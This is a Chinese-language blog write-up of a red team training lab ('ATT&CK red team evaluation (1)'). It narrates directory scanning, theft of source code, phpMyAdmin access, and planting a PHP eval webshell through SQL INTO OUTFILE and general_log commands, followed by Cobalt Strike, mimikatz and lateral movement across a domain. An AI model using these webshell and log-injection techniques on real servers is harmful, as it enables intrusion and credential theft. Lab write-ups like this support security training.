SongShuA

SongShuA

胸中梦黄粱,手握自在心 一个充满想法的网络安全从业人员 A person with dreams in their heart and the ability to control their own destiny, who is a creative professional in the field of cybersecurity.
github

ATT&CK實戰系列-紅隊評估(一)靶場筆記

ATT&CK 實戰系列 - 紅隊評估(一)靶場筆記#

靶場連結

概況:

虛擬機密碼
hongrisec@2019 登入後需重設

win7
192.168.0.1/24 橋接
192.168.52.0/24 內網

win2003
192.168.52.0/24 內網

win2008
192.168.52.0/24 內網

靶機部署

先啟動 win2008 DC 主機
再啟動 win2003
最後啟動 win7
win7 主機 C 盤下啟動 phpstudy(軟體損壞無法啟動,自行另外安裝並且遷移 WWW 內除 phpmyadmin 外檔案)

Alt text

正文#

先對外網伺服器掃描,查看 80 端口。
@端口資訊

@存在一個探針
@掃描工具這裡用了御劍

掃描爆破下目錄,發現可以列目錄。(可能是新裝 phpstudy 導致的)發現存在敏感檔案 beifen.rar 和 phpmyadmin 登入。Alt textAlt text

下載敏感檔案解壓,發現是原始碼。按照原始碼資料夾拼接 URL,發現一個存在一個殘缺的 CMS,仔細查看沒什麼用。Alt text

再看原始碼,從原始碼中找到資料庫密碼
Alt text
拿到資料庫 root 帳戶密碼,正好可以登入 phpmyadmin
先寫一個一句話,路徑可以從探針裡獲得

select "<?php @eval($_POST[a]);?>" into outfile (“C:/WWW/11.php”);

Alt text
失敗了,有限制

改用日誌試試

set global general_log='on'; #開啟日誌功能
set global general_log_file=’D:/WWW/xxx.php’; #設定日誌保存地址

最後再查詢一下,讓查詢內容寫進去

select ‘<?php @eval($_POST[a]);?>’;

然後用菜刀連接(最開始用了蟻劍,但是連不上,原因未知。)
Alt text
用菜刀再寫個冰蠅以備後患,冰蠅查下權限
Alt text

用冰蠅彈 msf shell
Alt text

msf 無法切入 shell,總是異常中斷,猜測是殺軟或者防火牆的原因

Alt text
換老方法,用 webshell 傳個馬過去,虛擬終端主動與運行靜等 cs 上線
Alt text
上手先給自己再委派幾個分身,防止掉會話

往下就沒啥可說了,本來想著這套靶機可以玩花樣,但拿到機器就是管理員權限,剩下兩台主機服務崩的崩掉的掉,也沒怎麼搞。還是用老路子,先 mimikatz 讀內存裡的密碼。
按網絡拓撲圖的思路,應該先拿下 win2003,再利用域拿下 win2008。這裡票據傳輸進 2003,再讀密碼,獲得域管帳戶,再傳輸進 2008。面對不出網機器需要走 SMB beacon。攻擊會話注意網段。

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。